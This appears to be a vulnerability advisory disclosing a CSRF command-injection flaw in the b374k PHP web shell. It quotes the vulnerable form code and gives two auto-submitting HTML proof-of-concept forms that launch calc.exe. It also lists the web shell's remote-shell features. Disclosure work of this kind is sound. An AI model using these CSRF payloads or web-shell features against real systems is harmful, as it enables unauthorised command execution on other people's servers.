b374k 3.2.3 2.8 CSRF / Command Injection

`[+] Credits: hyp3rlinx  
  
[+] Website: hyp3rlinx.altervista.org  
  
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AS-B374K-CSRF-CMD-INJECTION.txt  
  
  
  
Vendor:  
============================================  
github.com/b374k/b374k  
code.google.com/p/b374k-shell/downloads/list  
code.google.com/archive/p/b374k-shell/  
  
  
  
Product:  
==============================================  
b374k versions 3.2.3 and 2.8  
  
b374k is a PHP Webshell with many features such as:  
  
File manager (view, edit, rename, delete, upload, download as archive,etc)  
Command execution, Script execution (php, perl, python, ruby, java,  
node.js, c)  
Give you shell via bind/reverse shell connect  
Connect to DBMS (mysql, mssql, oracle, sqlite, postgresql, and many more  
using ODBC or PDO)  
Process list/Task manager.  
  
This is useful for system/web admin to do remote management without opening  
cpanel, connecting using ssh,  
ftp etc. All actions take place within a web browser.  
  
Note:  
b374k is considered by some as a malicious backdoor and is flagged by some  
AV upon download.  
  
  
Vulnerability Type:  
=============================  
CSRF Remote Command Injection  
  
  
  
  
Vulnerability Details:  
=====================  
  
No CSRF protection exists in b374k Web Shell allowing arbitrary OS command  
injection, if currently  
logged in user visits our malicious website or clicks our infected linxs.  
  
vulnerable b374k code:  
  
<?php  
if(isset($_GP['cmd'])) <------ $_GP holds value of $_GET passed to the  
shell.  
  
<form action='<?php echo $s_self; ?>' method='post'>  
<input id='cmd' onclick="clickcmd();" class='inputz' type='text' name='cmd'  
style='width:70%;' value='<?php  
if(isset($_GP['cmd'])) echo "";  
  
else echo "- shell command -";  
?>' />  
<noscript><input class='inputzbut' type='submit' value='Go !'  
name='submitcmd' style='width:80px;' /></noscript>  
  
</form>  
  
  
Exploit code(s):  
=================  
  
Run Windows calc.exe as POC...  
  
[CSRF Command Injections]  
  
v3.2  
  
  
Adding password and packing to b374k single PHP file.  
  
c:\xampp\htdocs\b374k-master>php -f index.php -- -o myshell.php -p abc123  
-s -b -z gzcompress -c 9  
b374k shell packer 0.4.2  
  
Filename : myshell.php  
Password : xxxxxx  
Theme : default  
Modules : convert,database,info,mail,network,processes  
Strip : yes  
Base64 : yes  
Compression : gzcompress  
Compression level : 9  
Result : Succeeded : [ myshell.php ] Filesize : 111419  
  
  
(CSRF Command injection 1)  
  
<form id='ABYSMALGODS' action='  
http://localhost/b374k-master/myshell.php?run=convert,database,info,mail,network,processes'  
method='post'>  
<input id='cmd' type='text' name='terminalInput' value='calc.exe' />  
<script>document.getElementById('ABYSMALGODS').submit()</script>  
</form>  
  
  
  
v2.8  
  
(CSRF Command injection 2)  
  
<form id='HELL' action='http://localhost/b374k-2.8.php?' method='post'>  
<input id='cmd' type='text' name='cmd' value='calc.exe' />  
<script>document.getElementById('HELL').submit()</script>  
</form>  
  
  
Exploitation Technique:  
=======================  
Remote  
  
  
  
  
Severity Level:  
===============  
High  
  
  
  
  
Description:  
==================================================  
  
Request Method(s): [+] POST  
  
  
Vulnerable Product: [+] b374k 3.2 and 2.8  
  
  
Vulnerable Parameter(s): [+] terminalInput, cmd  
  
  
Affected Area(s): [+] OS  
  
  
  
[+] Disclaimer  
Permission is hereby granted for the redistribution of this advisory,  
provided that it is not altered except by reformatting it, and that due  
credit is given. Permission is explicitly given for insertion in  
vulnerability databases and similar, provided that due credit is given to  
the author.  
The author is not responsible for any misuse of the information contained  
herein and prohibits any malicious use of all security related information  
or exploits by the author or elsewhere.  
  
by hyp3rlinx  
`